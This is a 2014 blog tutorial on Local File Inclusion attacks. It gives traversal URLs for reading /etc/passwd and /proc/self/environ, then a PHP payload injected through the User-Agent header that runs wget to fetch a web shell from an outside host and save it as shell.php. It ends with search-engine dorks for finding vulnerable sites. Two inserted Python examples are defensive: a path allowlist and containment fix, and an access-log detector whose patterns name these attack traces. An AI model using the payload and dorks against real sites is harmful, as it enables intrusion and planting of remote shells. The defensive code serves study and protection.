Saturday 4 October 2014

LFI Tutorial

LOCAL FILE INCLUSION (LFI)
In the name of my GOD the most Beneficent and the Merciful.

Today I am posting this Local File Inclusion (LFI) tutorial.

Let's start.

1. Getting RCE with LFI via /proc/self/environ

So first let's try fetching /etc/passwd to confirm whether the parameter is vulnerable to directory traversal or not.

../ is used to move into the upper (parent) directory on *nix.

http://www.website.com/index.php?load=../etc/passwd (did not work)

www.website.com/index.php?load=../../../../../etc/passwd (worked!)

Result:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin


That shows every user account on that server, with its home directory and shell. Each ../ causes the script to move up one directory; enough ../ sequences take it to the top-level directory (/, the root of the filesystem), and /etc/passwd is the Unix passwd file.
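The root cause of the traversal above is that the script hands the load/page parameter straight to include() (or a similar file-reading call), so whatever path the client supplies is opened relative to the web root. The following is an added example, not code from this tutorial, showing the two standard fixes as a small Python module: an allowlist that maps the parameter to a fixed set of page names, and a fallback containment check that decodes and canonicalises the path and refuses anything that resolves outside the pages directory. The web root is the DOCUMENT_ROOT value that appears later on this page; the pages subdirectory and the allowlist are assumptions made for the example.

```python
import os
import urllib.parse

# DOCUMENT_ROOT as shown in the /proc/self/environ dump on this page.
WEB_ROOT = "/home/sirgod/public_html"
# Assumed layout for the example: includable pages live in one subdirectory.
PAGES_DIR = os.path.realpath(os.path.join(WEB_ROOT, "pages"))
# Assumed allowlist of page names the application actually ships.
ALLOWED_PAGES = {"home", "about", "contact"}


def resolve_by_allowlist(param):
    """Preferred fix: the parameter selects a name from a fixed set and is
    never used as a path, so "../../../../../etc/passwd" is rejected outright
    and can never be looked up on disk."""
    if param in ALLOWED_PAGES:
        return PAGES_DIR + "/" + param + ".php"
    return None


def resolve_by_containment(param):
    """Fallback fix when pages really are addressed by relative path:
    URL-decode once (PHP already decodes $_GET, but a framework may hand over
    the raw query string), reject NUL bytes, canonicalise with realpath() so
    that ../ sequences and symlinks are resolved, and then require the result
    to sit strictly below PAGES_DIR."""
    decoded = urllib.parse.unquote(param)
    if "\x00" in decoded:
        return None
    # os.path.join discards PAGES_DIR when decoded starts with "/", so an
    # absolute path such as /etc/passwd is caught by the containment test.
    candidate = os.path.realpath(os.path.join(PAGES_DIR, decoded))
    if candidate == PAGES_DIR:
        return None  # "." or "" would include the directory itself
    if os.path.commonpath([PAGES_DIR, candidate]) != PAGES_DIR:
        return None  # escaped the pages directory
    return candidate


if __name__ == "__main__":
    for p in ("home", "../../../../../etc/passwd",
              "..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron"):
        print(repr(p), "->", resolve_by_allowlist(p), "|", resolve_by_containment(p))
```

The allowlist is the version to ship: it removes the filesystem from the decision entirely. The containment check is for legacy code that cannot be restructured, and it only works because realpath() runs before the comparison; comparing the raw string against a prefix, or stripping "../" once, is exactly what the encoded ..%2F variant shown later on this page is designed to get past.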

Checking if /proc/self/environ is accessible

Now let's see if /proc/self/environ is accessible.

We replace etc/passwd with proc/self/environ:

www.website.com/view.php?page=../../../../../proc/self/environ

If you get something like this:

DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.website.com
HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE= Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

then /proc/self/environ is accessible.

If you get a blank page or an error, /proc/self/environ is not accessible, or the OS is FreeBSD.



- Injecting malicious code -

Now let's inject our malicious code into /proc/self/environ.

How can we do that? We can inject our code through the User-Agent HTTP header, because the web server copies the request headers into the environment of the process that handles the request, and that environment is what /proc/self/environ shows (note the HTTP_USER_AGENT line in the output above). Use the Tamper Data add-on for Firefox to change the User-Agent.

Start Tamper Data in Firefox and request the URL: www.website.com/view.php?page=../../../../../proc/self/environ

Choose Tamper and in the User-Agent field write the following code:

<?system('wget http://hack-bay.com/Shells/gny.txt -O shell.php');?>

Then submit the request. Our command will be executed through system(): wget downloads the shell and saves it as shell.php in the website directory, and our shell is created. If it doesn't work, try exec(), because system() can be disabled on the web server from php.ini.


- Access our shell -

Now let's check if our malicious code was successfully injected, i.e. if the shell is present:

www.website.com/shell.php

Our shell is there. The injection was successful.
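Every step of the procedure above leaves a distinct trace in the web server's access log: a traversal sequence in the query string, a request whose target is /etc/passwd or /proc/self/environ, and then a PHP open tag in the User-Agent (or Referer) header, followed by a request for a file that did not exist before. The following is an added example, not part of the original tutorial, that parses a few constructed Apache combined-format log lines, normalises URL encoding so that ..%2F and ../ are treated alike, tags each request with the indicators it matches, and groups the indicators per client address so that the whole chain stands out. The log lines, addresses, timestamps and the harmless PHP tag in the fourth line are made up for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format; not real traffic.
# The last quoted field is the User-Agent, the header the tutorial above uses.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Oct/2014:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.9 - - [04/Oct/2014:10:00:02 +0000] "GET /index.php?load=../../../../../etc/passwd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [04/Oct/2014:10:00:03 +0000] "GET /view.php?page=..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2048 "-" "Opera/9.80"
10.0.0.9 - - [04/Oct/2014:10:00:04 +0000] "GET /view.php?page=../../../../../proc/self/environ HTTP/1.1" 200 2048 "-" "<?php echo 'x'; ?>"
10.0.0.9 - - [04/Oct/2014:10:00:05 +0000] "GET /shell.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

TRAVERSAL_RE = re.compile(r'\.\.[/\\]')                      # "../" or "..\"
SENSITIVE_RE = re.compile(r'/etc/passwd|/proc/(?:self|\d+)/environ', re.I)
PHP_TAG_RE = re.compile(r'<\?(?:php)?', re.I)                # also flags <?xml; fine for a header


def normalise(value):
    """URL-decode twice so that ..%2F and double-encoded ..%252F both
    collapse to ../ before the patterns are applied."""
    return unquote(unquote(value))


def analyse_line(line):
    """Return a dict describing the request and the indicators it matches,
    or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    indicators = []
    uri = normalise(m.group("uri"))
    if TRAVERSAL_RE.search(uri):
        indicators.append("traversal")
    if SENSITIVE_RE.search(uri):
        indicators.append("sensitive-path")
    for field in ("ua", "referer"):
        if PHP_TAG_RE.search(normalise(m.group(field))):
            indicators.append("php-tag-in-" + field)
    return {"ip": m.group("ip"), "time": m.group("ts"), "uri": m.group("uri"),
            "status": int(m.group("status")), "indicators": indicators}


def severity(indicators):
    """Rank one request: code in a header on top of a traversal is the
    injection step itself; reading a sensitive file is the probe before it."""
    has_code = any(i.startswith("php-tag-in-") for i in indicators)
    if has_code and "traversal" in indicators:
        return "critical"
    if "sensitive-path" in indicators:
        return "high"
    if "traversal" in indicators or has_code:
        return "medium"
    return "none"


def analyse_log(text):
    """Return (findings, per_ip): every flagged request with its severity,
    and the union of indicators seen from each client address."""
    findings, per_ip = [], {}
    for line in text.splitlines():
        rec = analyse_line(line)
        if rec is None or not rec["indicators"]:
            continue
        rec["severity"] = severity(rec["indicators"])
        findings.append(rec)
        per_ip.setdefault(rec["ip"], set()).update(rec["indicators"])
    return findings, per_ip


if __name__ == "__main__":
    found, by_ip = analyse_log(SAMPLE_LOG)
    for f in found:
        print(f["severity"].upper(), f["ip"], f["uri"], f["indicators"])
    for ip, inds in by_ip.items():
        print(ip, "->", sorted(inds))
```

On the sample data this flags three requests from 10.0.0.9, the last of them critical, and nothing from 10.0.0.5. The per-address grouping matters more than any single rule: a lone "../" in a query string is noise on a busy site, but traversal, a /proc/self/environ read and a PHP tag in a header from the same address within seconds is the sequence this tutorial describes. On the hardening side, the tutorial's own remark that system() "can be disabled from php.ini" refers to the disable_functions directive; combining it with open_basedir limits both what injected code can call and which paths include() can reach.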

Dorks for finding LFI-vulnerable websites:

inurl:index.php?cat=
inurl:index.php?x=
inurl:index.php?id=
inurl:index.php?page=
inurl:index.php?module=
inurl:index.php?p=
inurl:index.php?action=
inurl:index.php?content=

Thanks for reading. :)
